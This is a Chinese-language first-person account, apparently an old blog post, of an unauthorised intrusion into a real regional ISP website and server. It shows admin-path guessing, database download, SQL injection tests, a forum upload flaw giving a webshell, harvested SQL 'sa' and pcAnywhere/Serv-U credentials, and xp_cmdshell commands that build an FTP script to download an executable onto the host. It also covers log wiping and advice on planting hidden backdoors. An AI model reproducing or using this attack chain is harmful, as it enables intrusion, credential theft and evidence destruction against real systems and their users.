一次对孝感铁通网站的检测过程
听说铁通有个在线电影站,作为铁通用户还没享受过,赫赫,
今天无事看看,进入主页www.xgcrc.com发现很空。
试试猜解几个默认管理员入口很幸运找到
http://www.xgcrc.com/newsadminlogon.asp
很多这样的系统都可以下到数据库,这个也不例外
http://www.xgcrc.com/newsdatabase/xgcrc****.mdb
赫赫,怎么来的?猜的哟!你网站是xgcrc你mdb不要用
这个名字比较好。
拿出mdb数据库查看器看看里面有什么:
sabbat:******* 管理员
blackcat:*******
chirs:*******
我没进去,只是看了看,呵呵。
blackcat这位同志的密码好简单!
再看看还能找到什么。
http://www.xgcrc.com/mov/ 在线电影站
随便点一个试试
http://www.xgcrc.com/mov/movie.asp?id=343
试试看有没asp注入漏洞
http://www.xgcrc.com/mov/movie.asp?id=343 and 1=1 (和上面一样没变化)
http://www.xgcrc.com/mov/movie.asp?id=343 and 1=2 (出错了,看来有注入漏洞)
这个剩下的工作就由别人写好的程序完成,手工猜解费时间,网上这个方面程序很多。
很快就得到了管理员入口和帐号
http://www.xgcrc.com/mov/login.asp
xgcrc****:xgcrc****
倒!都是xgcrc开头,呵呵!
我没有电影传上去给大家看,不好意思:)
这样看来问题还很多的,可以传电影的话不知道能不能传木马上去?
赫赫,不过我不会这样作,因为我还想继续上网。
到这里也许很多人都想继续拿到这台主机的管理员权限,我也是。
利用上面的漏洞拿到管理员权限也不会太难。
我们再来看看哪里还可以利用的。
论坛!对,就是它
http://www.xgcrc.com/forum/
动网论坛Dvbbs+mssql
赫赫,不知道打补丁没有,好像有一个上传文件漏洞,可以传asp文件上去执行。
http://www.xgcrc.com/forum/upfile.asp
就是这个upfile.asp文件
这个方面的资料可以到动网官方论坛了解和修补。
传一个asp文件上去,很快就得到了webshell,这样这台主机上所有文件我几乎
都可以查看到了。剩下的就是提升权限了,毕竟主机的管理员权限才吸引人,
我不是要破坏,只是作为铁通的一个用户,尽下义务,最终目的就是希望我们铁通
网站稳定发展,给我们用户提供更多的电影,虽然现在还很少,嘿嘿!
这里我说说得到管理员权限的经过,扫描这台主机开的常用端口得到
61.232.210.10
TCP:7,9,13,19,21,25,53,80,110,119,443,563,1025,1029,1031,1433,3372,5631,8080
UDP:7,1035,5632
上面说了论坛是Dvbbs+mssql组合,所以这里开了1433端口,如果拿到他的MSSQL密码,
就可能得到管理员权限。
用webshell找到了他网站目录
D:\web\
看看论坛目录下文件
dir D:\web\web\forum
看看有没有
*.asa,conn.asp这些东西,也就是数据库连接文件。
type D:\web\web\forum\CONN.ASP
赫赫,今天运气很好哟,CONN.ASP没有加密。
(这里说下,加密比较好。希望把所有ASP代码都加密。)
strSQLServerName = "61.232.210.10" ''服务器名称或地址
strSQLDBUserName = "sa" ''数据库帐号
strSQLDBPassword = "xgcrc****" ''数据库密码
strSQLDBName = "forum" ''数据库名称
又倒!xgcrc****
早知道我猜也猜出来了。:)
拿到这个用SqlExec连接器连接,
xplog70这个它没有删除也没有改名,什么限制都没有,直接我就是system权限。hoho..
传几个工具上去检测下。既然没有限制这个mssql,写一个vbs脚本下载就可以了。
SqlExec连接器里输入
echo ftp>11.vbs
echo open *.*.*.*>>11.vbs
echo **>>11.vbs
echo binary>>11.vbs
echo get **.exe>>11.vbs
echo quit>>11.vbs
执行
ftp -s:11.vbs
检测工具就下载到了主机。
CPU 2.40GHz
Ram: 510MB
Os:Microsoft Windows 2000 Advanced Server Service Pack 4
很普通的配置,就带宽多点,呵呵。
终端端口8964(这个可能是别人入侵开的)
里面还发现有别人留的后门,能清理的我清理了一些。
删了sql数据库扩展。留管理员自己去处理。
如果你入侵的是那些反动网站,在这里可以给它安上一些后门和admin权限的asp木马。
这个就是个人技术问题了,要作的好,隐藏性和防杀性很重要。
到这里就已经完成了检测工作,清理掉日志文件和我下载到里面的程序。
这里还有一个地方也可以利用
61.232.210.10
TCP:5631
UDP:5632
Symantec pcAnywhere远程管理端口,拿到webshell后查看
c:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere
目录找到*.CIF文件下载后用pcAnywhere密码查看器可以得到pcAnywhere的帐号和密码
这台机器里是
PCA.xgcrc****.CIF这个文件。
下载一个Symantec pcAnywhere就可以连接主机了。
再一个地方就是他的21端口也就是ftp端口。他用的Serv-U FTP Server v4.0版本
这个版本的ftp程序有一个远程溢出漏洞,只要随便一个帐号就可以溢出得到system权限。
虽然现在铁通孝感站已经停止了下载,如果有了webshell一样可以得到ftp帐号。
这里我加了一个帐号blackbear进去测试了下,管理员请删除。
c:\program files\serv-u\ServUDaemon.ini
这个里面就有ftp帐号和加密的密码。
同时建议此机的管理员最好从新装系统,虽然我们可能几天不能看电影,嘿嘿!